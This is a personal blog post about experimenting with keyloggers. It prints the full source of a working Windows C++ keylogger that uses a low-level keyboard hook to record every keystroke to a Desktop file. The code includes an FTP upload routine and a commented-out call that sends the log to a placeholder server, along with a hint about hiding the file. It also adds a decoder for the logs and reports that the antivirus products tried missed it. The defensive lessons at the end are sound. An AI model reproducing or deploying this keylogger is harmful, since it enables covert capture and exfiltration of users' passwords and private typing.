A Short Journey into the Realm of Keyloggers

Although my experience in IT approaches two decades, I'm brand new to the field of cyber security. When I started working in this branch, just out of curiosity, I did some small experiments with some code and programs. The first area that drew my attention was keyloggers.

I found the following C++ code on the Rohitab website. I successfully compiled and ran it. Its name was “Keylogger.exe”.

    #pragma comment (lib,"wininet.lib")
    #pragma comment (lib,"shell32.lib")
    #include <windows.h>
    #include <wininet.h> //for uploadFile function
    #include <shlobj.h>  //for SHGetFolderPathA in getDesktopPath
    #include <cstdio>
    #include <cstdarg>
    #include <cstdlib>
    #include <cstring>
    #include <iostream>

    static HHOOK hKeyboardHook = NULL; //handle returned by SetWindowsHookEx
    static FILE *f = NULL;             //log file handle, reopened on every keystroke

    /*Extract only the file name from a path: "C:\\data\\x.php" => "x.php"*/
    char * extractFilename(char * path){
        char * ret = path;
        bool isFullPath = false;
        for (int i=0; path[i] != '\0'; i++)
        {
            if (path[i] == '\\' || path[i] == '/') //e.g. D:\Folder\file.txt
            {
                isFullPath = true;
                ret = path + i + 1; //the name starts after the last separator
            }
        }
        return isFullPath ? ret : path;
    }

    /*Concatenate a NULL-terminated list of strings into a newly malloc'd buffer*/
    char * dupcat(const char * first, ...)
    {
        size_t len = strlen(first);
        va_list ap;
        va_start(ap, first);
        for (const char *s; (s = va_arg(ap, const char *)) != NULL; )
            len += strlen(s);
        va_end(ap);

        char * out = (char *)malloc(len + 1);
        if (out == NULL) return NULL;
        strcpy(out, first);
        va_start(ap, first);
        for (const char *s; (s = va_arg(ap, const char *)) != NULL; )
            strcat(out, s);
        va_end(ap);
        return out;
    }

    /*Fill path (at least MAX_PATH chars) with the current user's Desktop directory*/
    bool getDesktopPath(char * path)
    {
        return SUCCEEDED(SHGetFolderPathA(NULL, CSIDL_DESKTOPDIRECTORY, NULL, SHGFP_TYPE_CURRENT, path));
    }

    /*Upload file to server*/
    BOOL uploadFile( char *filename, char *destination_name,char *address,char *username,char *password)
    {
        BOOL t = FALSE;
        HINTERNET hint,hftp;
        hint = InternetOpenA("FTP",INTERNET_OPEN_TYPE_PRECONFIG,0,0,0); //synchronous handle: FtpPutFile blocks until done
        if (hint == NULL) return FALSE;
        hftp = InternetConnectA(hint,address,INTERNET_DEFAULT_FTP_PORT,username,password,INTERNET_SERVICE_FTP,0,0);
        if (hftp != NULL)
        {
            t = FtpPutFileA(hftp,filename,destination_name,FTP_TRANSFER_TYPE_BINARY ,0);
            InternetCloseHandle(hftp);
        }
        InternetCloseHandle(hint);
        return t;
    }

    static int keysPressed = 0; //Lets count the keys pressed

    LRESULT CALLBACK Keylogger (int nCode, WPARAM wParam, LPARAM lParam)
    {
        char currentDirectory[MAX_PATH];
        char * workFullPath = NULL;

        if  ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
        {
            f = NULL;
            bool truth = getDesktopPath(currentDirectory); //If we can capture the desktop directory then we are good
            if (truth)
            {
                //Concatenate desktop directory and file name
                workFullPath = dupcat(currentDirectory,"\\work.txt",NULL); //So the file path will be like: C:\Users\Corporation\Desktop\work.txt
                if (workFullPath != NULL)
                    f = fopen(workFullPath,"a+"); //Open the file in append mode
            }
            KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);

            //Build the lParam GetKeyNameText expects: scan code in bits 16-23, extended-key flag (LLKHF_EXTENDED) in bit 24
            DWORD dwMsg = 1;
            dwMsg += hooked_key.scanCode << 16;
            dwMsg += hooked_key.flags << 24;

            char lpszKeyName[1024] = {0};
            lpszKeyName[0] = '[';
            int i = GetKeyNameTextA(dwMsg, (lpszKeyName + 1), 0xFF) + 1;
            lpszKeyName[i] = ']';
            int key = hooked_key.vkCode;

            //Key value or something else ?
            //if the key is A-Z then add the character to the file, lower-cased unless Shift is held
            if (key >= 'A' && key <= 'Z')
            {
                if (GetAsyncKeyState(VK_SHIFT) >= 0) //most significant bit clear => Shift is not down
                    key += 0x20;
                if (f != NULL)
                    fprintf(f,"%c", key);
            }
            //else add the name of the key. For example if the key is 32 -> add "[Space]" to the file, so we know that space has been pressed.
            else
            {
                if (f != NULL)
                    fprintf(f,"%s", lpszKeyName);
            }
            keysPressed ++;
            if (keysPressed == 150) //Enough data
            {
                //extractFilename is used to extract only the file from path:Example: C:\data\x.php,
                //extractFilename("C:\\data\\x.php") => x.php so that we add only the file to ftp
                //// uploadFile(workFullPath,extractFilename(workFullPath),"www.xyz.org","ftpUsername","ftpPassword"); //Upload the file to FTP
                keysPressed = 0;
            }

            //You can make the file hidden :))
            //hide_file(workFullPath);
            if (f != NULL)
                fclose(f);
            free(workFullPath);
        }
        return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
    }

    DWORD WINAPI JACKAL(LPVOID lpParm)
    {
        HINSTANCE hins = GetModuleHandle(NULL);
        hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC) Keylogger, hins, 0); //thread id 0 => every thread on this desktop
        if (hKeyboardHook == NULL)
            return 1;

        MSG message; //a low-level hook is only called while this thread pumps messages
        while (GetMessage(&message,NULL,0,0))
        {
            TranslateMessage( &message );
            DispatchMessage( &message );
        }

        UnhookWindowsHookEx(hKeyboardHook);
        return 0;
    }

    int main(){
        return (int) JACKAL(NULL);
    }

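The callback above produces a very regular log format: a letter key is written as a bare character (lower case unless Shift is physically held; Caps Lock is ignored), and every other key, digits and punctuation included, is written as the name GetKeyNameText returns, in square brackets. A short run of typing therefore ends up in work.txt as something like `[Shift]Hello[Space]w[0]rld[Enter]`. When such a file turns up during an investigation, the first job is to turn it back into what was typed. The decoder below is an added example written for this page, not code from the original post or from Rohitab. It assumes the US-English key names (Space, Backspace, Enter, Tab, Shift, Ctrl, Alt, Caps Lock and so on), since GetKeyNameText is layout-dependent, and it runs on a constructed sample log rather than a real capture.

```cpp
#include <iostream>
#include <map>
#include <set>
#include <string>

// Decode a log written by a hook callback of the kind shown above:
// bare characters are letters, "[Name]" tokens are every other key.
// The key names are the US-English ones GetKeyNameText returns (assumption).
std::string decodeKeylog(const std::string &log)
{
    // Named keys that do produce text.
    static const std::map<std::string, std::string> printable = {
        {"Space", " "}, {"Enter", "\n"}, {"Tab", "\t"},
    };
    // Modifier and lock keys are logged on press but produce no text.
    static const std::set<std::string> silent = {
        "Shift", "Right Shift", "Ctrl", "Right Ctrl", "Alt", "Right Alt",
        "Caps Lock", "Num Lock", "Scroll Lock",
    };

    std::string out;
    size_t i = 0;
    while (i < log.size()) {
        if (log[i] != '[') {            // letter written as a bare character
            out += log[i++];
            continue;
        }
        // The "]" key itself is logged as "[]]": an empty name followed by "]".
        std::string name;
        size_t close = log.find(']', i + 1);
        if (close == std::string::npos)
            break;                      // token cut off at end of file (process killed mid-write)
        if (close == i + 1 && close + 1 < log.size() && log[close + 1] == ']') {
            name = "]";
            close += 1;
        } else {
            name = log.substr(i + 1, close - i - 1);
        }
        i = close + 1;

        if (name == "Backspace") {      // undo the previous character
            if (!out.empty()) out.pop_back();
        } else if (printable.count(name)) {
            out += printable.at(name);
        } else if (silent.count(name)) {
            // modifier or lock key: nothing typed
        } else if (name.size() == 1) {  // digits and punctuation: GetKeyNameText returns the glyph
            out += name;
        } else {                        // function/navigation keys: keep them visible
            out += "<" + name + ">";
        }
    }
    return out;
}

int main()
{
    // Constructed sample, not a real capture: the user typed "Hello w0rld" with one typo.
    const std::string sample = "[Shift]Hello[Space]w[0]rlf[Backspace]d[Enter]";
    std::cout << decodeKeylog(sample);
    return 0;
}
```

Two limits of the log format are worth knowing before trusting the output. Shift state is only applied to letters, so `}` and `]` both arrive as `[]]` and a password containing shifted punctuation cannot be recovered exactly. And because the callback opens, writes and closes work.txt on every keystroke, a file that ends in a half-written token usually means the process was stopped mid-write, which the decoder handles by dropping the fragment.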

Then, while keylogger.exe was running, I started a text editor and some other programs and typed some keys. Yes, indeed, the program logged all the keystrokes I was typing. And most interestingly, none of the anti-virus programs I was using (including McAfee, AVG and Malware Bytes) detected this situation. This disturbed me a lot. Are we that vulnerable?

The code above just hooks the keystrokes of other programs. I would expect AVs to be able to follow this behaviour. I continued my research. This time I tried an assembly program from the Code Project website, which is not even bound to Windows hooks:

Assembly Keylogger Sample

Not surprisingly, the exe binary did not catch any attention while running. I started losing my faith in cyber security. Then a friend of mine suggested trying the programs against antilogger software. So I downloaded and used Zemana Antilogger from its website.

The antilogger program indeed successfully detected the first program. It did not detect the second program as malicious, but it successfully blocked it from working with the help of its encryption mechanism, which stops other programs from interfering with the flow of keystrokes.

Lessons Learned:

1) Never feel secure; use an on-screen keyboard for sensitive information.

2) Definitely use an Antilogger program.

3) Be happy and dance